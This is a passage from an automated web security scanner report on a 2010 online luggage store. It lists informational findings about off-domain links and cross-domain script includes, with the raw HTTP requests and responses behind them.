<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
...[SNIP]...

4.20. http://www.ebags.com/shoppingcart/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/shoppingcart/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=12%2f26%2f2010+6%3a59%3a59+AM&requesttimeout=9000&itemAdded=true

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_7_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_continueshopping.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_proceed.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart/bnr_MSPFbanner_ec2_143x32.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart_bottomleftcorner.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart_bottomrightcorner.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart_topleftcorner.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart_toprightcorner.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/s.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

POST /shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=12%2f26%2f2010+6%3a59%3a59+AM&requesttimeout=9000&itemAdded=true HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617?productid=1283460
Cache-Control: max-age=0
Origin: http://www.ebags.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1150; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373842|PC#1293371743230-938821.20#1294581582|check#true#1293372042; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":5,"to":5,"c":"http://www.ebags.com/shoppingcart/index.cfm","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1293371974968}; s_cc=true; __cmbDomTm=0; fsr.a=1293371984270; s_sq=ebagsprod%3D%2526pid%253DProduct%252520Details%252520%25253A%252520107617%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fa1512.g.akamaitech.net%25252Ff%25252F1512%25252F124%25252F1h%25252Fimages.ebags.com%25252Fimg%25252FProductDetail%25252Fadd-to-cart.gif%2526ot%253DIMAGE
Content-Length: 79

cartAction=additem&RequireCookie=YES&modelID=107617&ProductID=1283460&x=64&y=15

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 14:00:06 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:00:06 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 64326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a id="linkShop" href="javascript:continueShoppingLinks(); return false" onclick="continueShoppingLinks(); return false" onmouseover="continueShoppingLinks(); return false" style="position: relative"><img style="float: left;" src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_continueshopping.gif" border="0"></a>
...[SNIP]...
<td align="right">
<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart_topleftcorner.gif"></td>
<td width="920" bgcolor="#e9e9e9"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/s.gif"></td>
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart_toprightcorner.gif"></td>
...[SNIP]...
<a href="/products/index.cfm?ModelID=107617&Basketalready=yes&productID=1283460&ItemID=1&CartLink=View"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_7_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60" width=60 height=60 border=0 alt="baggallini - A La Carte Bagg - Medium - Crinkle Nylon" hspace="0" border="0" vspace="5"></a>
...[SNIP]...
<a href="javascript:chgFormFuseaction('SubmitCart');setVar();document.Form1.submit();"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_proceed.gif" alt="Proceed to Checkout" title="Click Here to Proceed to Checkout"> </a>
...[SNIP]...
<a href="/shoppingcart/index.cfm?fuseaction=PayPalExpressSend" >
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart/bnr_MSPFbanner_ec2_143x32.gif" border="0" title="Shipping method will default to standard ground but can be changed on the final cart page." >
</a>
...[SNIP]...
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart_bottomleftcorner.gif"></td>
<td width="920" bgcolor="#e9e9e9"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/s.gif"></td>
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/cart_bottomrightcorner.gif"></td>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
...[SNIP]...

5. Cross-domain script include previous next
There are 51 instances of this issue:

/
/blocks/ajax/helppop-up.cfm
/brand/bosca
/brand/burton
/brand/eagle-creek
/brand/fleurville
/brand/hobo-international
/brand/hurley
/brand/ju-ju-be
/brand/kalencom
/brand/lego
/brand/lodis
/brand/michael-michael-kors-watches
/brand/quiksilver
/brand/timi-and-leslie
/brands/index.cfm
/category/backpack-handbags/20036676
/category/carry-on-luggage/20048891
/category/clutches/20036679
/category/clutches/20048616
/category/cross-body-bags/20037212
/category/handbags/10014
/category/handbags/10014/h/sale
/category/hobos/20036674
/category/hobos/20048614
/category/travel-accessories/20014443
/department/backpacks
/department/bags-by-ebags
/department/business-and-laptop
/department/designer-handbags
/department/handbags
/department/kids-and-baby
/department/luggage
/department/messenger-bags
/department/sale
/department/snow-and-skate
/department/sports-and-duffels
/department/travel-accessories
/department/wallets-and-accessories
/help/
/help/index.cfm
/info/Compare/index.cfm
/info/index.cfm
/members/index.cfm
/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617
/product/case-logic/sony-psp-game-case/120830
/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538
/rewards/index.cfm
/shoppingcart/index.cfm
/travel_accessories/car_travel_accessories/category_search/index.cfm
/travel_accessories/travel_electronics_cases/category_search/index.cfm

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

5.1. http://www.ebags.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET / HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:34 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:02:34 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 74986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.2. http://www.ebags.com/blocks/ajax/helppop-up.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/blocks/ajax/helppop-up.cfm

Issue detail

The response dynamically includes the following script from another domain:

http://a1512.g.akamaitech.net/f/1512/124/1h/www.ebags.com/LivePerson/View/mtagconfig.js

Request

GET /blocks/ajax/helppop-up.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:17 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 3761

<div id="help-container">
<div class="contact-container">
<script language="JavaScript">
var akamaipath = 'http://a1512.g.akamaitech.net/f/1512/124/1h/www.ebags.com';
</script>
<script src="http://a1512.g.akamaitech.net/f/1512/124/1h/www.ebags.com/LivePerson/View/mtagconfig.js" type="text/Javascript"></script>
...[SNIP]...

5.3. http://www.ebags.com/brand/bosca previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/bosca

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /brand/bosca HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:12:59 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:12:59 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 116663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.4. http://www.ebags.com/brand/burton previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/burton

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /brand/burton HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:33 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:33 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 106082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
